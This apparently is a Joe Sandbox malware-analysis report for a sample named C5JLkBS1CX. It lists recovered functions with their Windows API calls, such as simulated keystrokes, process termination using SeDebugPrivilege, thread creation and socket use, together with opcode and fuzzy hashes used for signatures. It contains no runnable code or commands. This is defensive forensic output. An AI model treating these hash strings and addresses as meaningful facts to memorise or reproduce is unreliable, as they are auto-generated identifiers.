Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: a20b1a081419e0af1e1307bdc1ca192aeb6b6f8183b9c1042a2173e67b74fb8c
Instruction ID: d78eb935beebcb9a9d526e11868c5fa3b75c30a36b16987fe68733b7159a82db
Opcode Fuzzy Hash: a20b1a081419e0af1e1307bdc1ca192aeb6b6f8183b9c1042a2173e67b74fb8c
Instruction Fuzzy Hash: 47515C70640249AFDB24DF65DC45FAE3BAAFB44320F144528F956D72A0DBB0ED90DB60

Function 0063966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0063A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0063A84C
Part of subcall function 0063A82C: GetCurrentThreadId.KERNEL32 ref: 0063A853
Part of subcall function 0063A82C: AttachThreadInput.USER32(00000000,?,00639683,?,00000001), ref: 0063A85A

MapVirtualKeyW.USER32(00000025,00000000), ref: 0063968E
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 006396AB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 006396AE
MapVirtualKeyW.USER32(00000025,00000000), ref: 006396B7
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 006396D5
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 006396D8
MapVirtualKeyW.USER32(00000025,00000000), ref: 006396E1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 006396F8
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 006396FB

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: cf17f3b55aa375e0f55a22a09357fead301bdf16610c7923a3e9f86d1d70d87f
Instruction ID: e9a0ab36d43b2fa1ec1226b458104d628f68fcc5b8b64c1e1e3d3674efe52dfb
Opcode Fuzzy Hash: cf17f3b55aa375e0f55a22a09357fead301bdf16610c7923a3e9f86d1d70d87f
Instruction Fuzzy Hash: 1A11A571950618BEF7106F60EC4AF6A7B1EDB4D791F112429F244AB0A0C9F36C51DAF8

Function 00638921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0063853C,00000B00,?,?), ref: 0063892A
HeapAlloc.KERNEL32(00000000,?,0063853C,00000B00,?,?), ref: 00638931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0063853C,00000B00,?,?), ref: 00638946
GetCurrentProcess.KERNEL32(?,00000000,?,0063853C,00000B00,?,?), ref: 0063894E
DuplicateHandle.KERNEL32(00000000,?,0063853C,00000B00,?,?), ref: 00638951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0063853C,00000B00,?,?), ref: 00638961
GetCurrentProcess.KERNEL32(0063853C,00000000,?,0063853C,00000B00,?,?), ref: 00638969
DuplicateHandle.KERNEL32(00000000,?,0063853C,00000B00,?,?), ref: 0063896C
CreateThread.KERNEL32(00000000,00000000,00638992,00000000,00000000,00000000), ref: 00638986

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 163e4c2f0fb7b829600b7539ecc1785019c3845950db2c8e0e28e390ce960f0f
Instruction ID: 109be522b77b3120b5c84695545d8041a4c19bc961ff3c232fdcf4b5521ea15d
Opcode Fuzzy Hash: 163e4c2f0fb7b829600b7539ecc1785019c3845950db2c8e0e28e390ce960f0f
Instruction Fuzzy Hash: 9D01BF75240304FFE710ABA5EC4DF677B6DEB89751F415421FA05DB191CAB19800CB60

Function 00659B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 00659BA4, 00659EC8
Not an Object type, xrefs: 00659B7B

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: f736a7dcfef0411f99cb03d2da38610d15585d18f2e31959b1c852560cac90e3
Instruction ID: 4ef3b5dda59dd3f8cf527632763c5e698af15a7cad72fbc902623cd51d4ad989
Opcode Fuzzy Hash: f736a7dcfef0411f99cb03d2da38610d15585d18f2e31959b1c852560cac90e3
Instruction Fuzzy Hash: 5FC19171A0020ADBDF14CF58D885AEEB7F6EF48315F148569ED05AB281E770AD49CBA0

Function 0065975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 0063710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00637044,80070057,?,?,?,00637455), ref: 00637127
Part of subcall function 0063710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00637044,80070057,?,?), ref: 00637142
Part of subcall function 0063710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00637044,80070057,?,?), ref: 00637150
Part of subcall function 0063710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00637044,80070057,?), ref: 00637160

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00659806
_memset.LIBCMT ref: 00659813
_memset.LIBCMT ref: 00659956
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00659982
CoTaskMemFree.OLE32(?), ref: 0065998D

Strings

NULL Pointer assignment, xrefs: 006599DB

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: b3f19c5ca957220d806727eb6878b38928011e1b2c690c338415d3bfdbada3b7
Instruction ID: 5bae948b6650c0825f2dba15683cc269f23f2e0ff37c24fc34b3ce5f86e2890d
Opcode Fuzzy Hash: b3f19c5ca957220d806727eb6878b38928011e1b2c690c338415d3bfdbada3b7
Instruction Fuzzy Hash: 9E912971D00229EBDB14DFA5DC45EDEBBBABF48310F10415AF819A7291EB719A44CFA0

Function 00666D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00666E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 00666E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00666E52
_wcscat.LIBCMT ref: 00666EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 00666EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00666EF2

Strings

SysListView32, xrefs: 00666DF6

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 9ea32da7e6a8b55ffd20ecc96ba9cd6c8787a812983be6ddbe0771243ead6524
Instruction ID: 9f7082989e1ed0f690b3be1848619473400daa433e8f2af8331e3f3ce56bbefc
Opcode Fuzzy Hash: 9ea32da7e6a8b55ffd20ecc96ba9cd6c8787a812983be6ddbe0771243ead6524
Instruction Fuzzy Hash: B241B170A00349EBDF21DF64DC85BEEB7EAEF08350F10042AF595E7291D6729D848B60

Function 0065E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00643C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00643C7A
Part of subcall function 00643C55: Process32FirstW.KERNEL32(00000000,?), ref: 00643C88
Part of subcall function 00643C55: CloseHandle.KERNEL32(00000000), ref: 00643D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0065E9A4
GetLastError.KERNEL32 ref: 0065E9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0065E9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 0065EA63
GetLastError.KERNEL32(00000000), ref: 0065EA6E
CloseHandle.KERNEL32(00000000), ref: 0065EAA3

Strings

SeDebugPrivilege, xrefs: 0065E9C2

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: b236919a051fd673ae9188d152da90a642a8a64a022a12edcbcdb637f6a176da
Instruction ID: 7bf904500ffa4034d21fd196dfbf88933db02f5b8f6eb35819f8fc72aca8cdf3
Opcode Fuzzy Hash: b236919a051fd673ae9188d152da90a642a8a64a022a12edcbcdb637f6a176da
Instruction Fuzzy Hash: 4341B1716042019FDB18EF24DC95FADBBA6BF80310F04841CF9429B3D2CBB5A908CB95

Function 00642F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00643033

Strings

stop, xrefs: 00643004
blank, xrefs: 00642FB5
question, xrefs: 00642FEC
warning, xrefs: 0064301C
info, xrefs: 00642FD4

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 7789a02efa0f0284c51a739997f5214d4e7a5fe036f005f623637ecf57e5d570
Instruction ID: f86c0f85e9b34527db6a2cbe00343a8368b27335f0f9e63003c219c6af76edaf
Opcode Fuzzy Hash: 7789a02efa0f0284c51a739997f5214d4e7a5fe036f005f623637ecf57e5d570
Instruction Fuzzy Hash: D8112B313C8357BEDB549B14EC42CAB7B9E9F16720B20012AF900A67C2DBB15F4456A4

Function 006442F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00644312
LoadStringW.USER32(00000000), ref: 00644319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0064432F
LoadStringW.USER32(00000000), ref: 00644336
_wprintf.LIBCMT ref: 0064435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0064437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00644357

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 2da96e6faf7848751f88158fa88ed1c6570e7399e9d086bede12f3b1f74c91fb
Instruction ID: bce56f45e573ab89ddb474a070a9f7752b389c7c0052bdf2e9f8221e2d2bf957
Opcode Fuzzy Hash: 2da96e6faf7848751f88158fa88ed1c6570e7399e9d086bede12f3b1f74c91fb
Instruction Fuzzy Hash: 7701A2F2800208BFE7119BA0ED89FE7776DEB08700F0005A2F705E2151EAB05E854B70

Function 0066D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005E2612: GetWindowLongW.USER32(?,000000EB), ref: 005E2623

GetSystemMetrics.USER32(0000000F), ref: 0066D47C
GetSystemMetrics.USER32(0000000F), ref: 0066D49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0066D6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0066D6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0066D716
ShowWindow.USER32(00000003,00000000), ref: 0066D735
InvalidateRect.USER32(?,00000000,00000001), ref: 0066D75A
DefDlgProcW.USER32(?,00000005,?,?), ref: 0066D77D

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 7ac4eb63eb277cbce3e60acc1ecf29582a581ba14fb78a26952eb48e70bb3b99
Instruction ID: 3dba34d6966603d693d455746b4171e32d491992b8e8464a6b05bc8a3e355ba1
Opcode Fuzzy Hash: 7ac4eb63eb277cbce3e60acc1ecf29582a581ba14fb78a26952eb48e70bb3b99
Instruction Fuzzy Hash: ABB18871A00225EFDF14CF69C985BED7BB2BF48711F088069EC499B295DB74AD50CBA0

Function 005E2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0061C1C7,00000004,00000000,00000000,00000000), ref: 005E2ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0061C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 005E2B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0061C1C7,00000004,00000000,00000000,00000000), ref: 0061C21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0061C1C7,00000004,00000000,00000000,00000000), ref: 0061C286

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 3b66140db7928a5470fbaefe93df0f3d383ab710a0ec2652651a680009bc6fc6
Instruction ID: 6398a37797e4ac6840107b31d03ba0cb22ec9e9c0b582c3316980c37800e32f4
Opcode Fuzzy Hash: 3b66140db7928a5470fbaefe93df0f3d383ab710a0ec2652651a680009bc6fc6
Instruction Fuzzy Hash: 6441E8316086C09BC73D9B2ADC98BAE7F9BBB85310F18983DE0C786565C6B5A8C1D711

Function 006470C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 006470DD

Part of subcall function 00600DB6: std::exception::exception.LIBCMT ref: 00600DEC
Part of subcall function 00600DB6: __CxxThrowException@8.LIBCMT ref: 00600E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00647114
EnterCriticalSection.KERNEL32(?), ref: 00647130
_memmove.LIBCMT ref: 0064717E
_memmove.LIBCMT ref: 0064719B
LeaveCriticalSection.KERNEL32(?), ref: 006471AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 006471BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 006471DE

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 92dbe58b66a74be499ec030e140c3717b2ea9827ab161d6d034e7ba032d2747e
Instruction ID: 53f757f5905971f4aaa02c96b26c363774562652377296037d10b863373755d6
Opcode Fuzzy Hash: 92dbe58b66a74be499ec030e140c3717b2ea9827ab161d6d034e7ba032d2747e
Instruction Fuzzy Hash: 32316E31900205EBDB40DFA4DD85AAFB77AFF45710F1441A9F904AB286DB709E10CB64

Function 006661D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 006661EB
GetDC.USER32(00000000), ref: 006661F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 006661FE
ReleaseDC.USER32(00000000,00000000), ref: 0066620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00666246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00666257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0066902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00666291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 006662B1

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 3576df7cad9dd477040942c79777d70db95d717ad922387df323f76caace4ecf
Instruction ID: c6959887cb4d52bbd8bdb9474e579d35786c1ff5da74bf4c6035c1c6a3edf40d
Opcode Fuzzy Hash: 3576df7cad9dd477040942c79777d70db95d717ad922387df323f76caace4ecf
Instruction Fuzzy Hash: C7317172101210BFEB118F50EC4AFEA3BAEEF4A755F044065FE08DA291C6B59C41CB74

Function 0064EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 005E9837: __itow.LIBCMT ref: 005E9862
Part of subcall function 005E9837: __swprintf.LIBCMT ref: 005E98AC

Part of subcall function 005FFC86: _wcscpy.LIBCMT ref: 005FFCA9

_wcstok.LIBCMT ref: 0064EC94
_wcscpy.LIBCMT ref: 0064ED23
_memset.LIBCMT ref: 0064ED56

Strings

X, xrefs: 0064ED93

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 02a01d4343827376d827d0c860c8db1fa4165a329fd0b79f8412a6a34f73def4
Instruction ID: 9a1898b870a2daca4e70d43859580da74928a417591cac6ef62fbb465bb31636
Opcode Fuzzy Hash: 02a01d4343827376d827d0c860c8db1fa4165a329fd0b79f8412a6a34f73def4
Instruction Fuzzy Hash: B8C180715083429FC758EF24C885A9ABBE5FF85314F10492DF8999B2A2DB71EC45CB42

Function 00656B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00656C00
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00656C21
WSAGetLastError.WSOCK32(00000000), ref: 00656C34
htons.WSOCK32(?,?,?,00000000,?), ref: 00656CEA
inet_ntoa.WSOCK32(?), ref: 00656CA7

Part of subcall function 0063A7E9: _strlen.LIBCMT ref: 0063A7F3
Part of subcall function 0063A7E9: _memmove.LIBCMT ref: 0063A815

_strlen.LIBCMT ref: 00656D44
_memmove.LIBCMT ref: 00656DAD

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 84836003d570cecbbe0bcccf1a523432c674597eed4ae6541d759c1055ea0191
Instruction ID: 9baa85a2ee52e565d9061fa75f254a0f6b09623eb162b8a13f2f37d7b74bcb29
Opcode Fuzzy Hash: 84836003d570cecbbe0bcccf1a523432c674597eed4ae6541d759c1055ea0191
Instruction Fuzzy Hash: 3581F171204301ABC714EF25DC86EABBBBAAFC4314F504A2CF9959B292DB70DD05CB91

Function 005E1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
